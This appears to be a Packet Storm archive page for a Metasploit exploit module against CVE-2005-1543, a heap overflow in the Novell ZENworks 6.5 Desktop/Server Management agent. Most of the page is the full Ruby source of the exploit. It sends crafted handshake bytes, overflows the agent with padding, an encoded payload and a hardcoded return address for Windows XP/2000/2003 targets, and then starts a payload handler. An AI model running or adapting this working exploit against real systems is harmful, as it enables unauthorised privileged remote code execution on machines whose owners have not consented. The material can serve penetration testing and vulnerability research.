exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Novell ZENworks 6.5 Desktop/Server Management Overflow

Novell ZENworks 6.5 Desktop/Server Management Overflow
Posted Nov 26, 2009
Authored by anonymous | Site metasploit.com

This Metasploit module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler.

tags | exploit, overflow
advisories | CVE-2005-1543
SHA-256 | a468b60beef7167326397d8bf03b1490959d3e5778ff2338a43b241907526e6d

Novell ZENworks 6.5 Desktop/Server Management Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',
'Description' => %q{
This module exploits a heap overflow in the Novell ZENworks
Desktop Management agent. This vulnerability was discovered
by Alex Wheeler.

},
'Author' => [ 'anonymous' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-1543'],
[ 'OSVDB', '16698'],
[ 'BID', '13678'],

],
'Privileged' => true,
'Payload' =>
{
'Space' => 32767,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',
{
'Platform' => 'win',
'Ret' => 0x10002e06,
},
],
],
'DisclosureDate' => 'May 19 2005',
'DefaultTarget' => 0))
end

def exploit
connect

hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"
print_status("Sending version identification")
sock.put(hello)

pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars)
ident = sock.get_once
if !(ident and ident.length == 16)
print_status("Failed to receive agent version identification")
return
end

print_status("Received agent version identification")
print_status("Sending client acknowledgement")
sock.put("\x00\x01")

# Stack overflow in ZenRem32.exe / ZENworks Server Management
sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")

ack = sock.get_once
sock.put("\x00\x01")
sock.put("\x00\x02")

print_status("Sending final payload")
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))

print_status("Overflow request sent, sleeping for four seconds")
sleep(4)

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    13 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    27 Files
  • 30
    Jul 30th
    49 Files
  • 31
    Jul 31st
    29 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close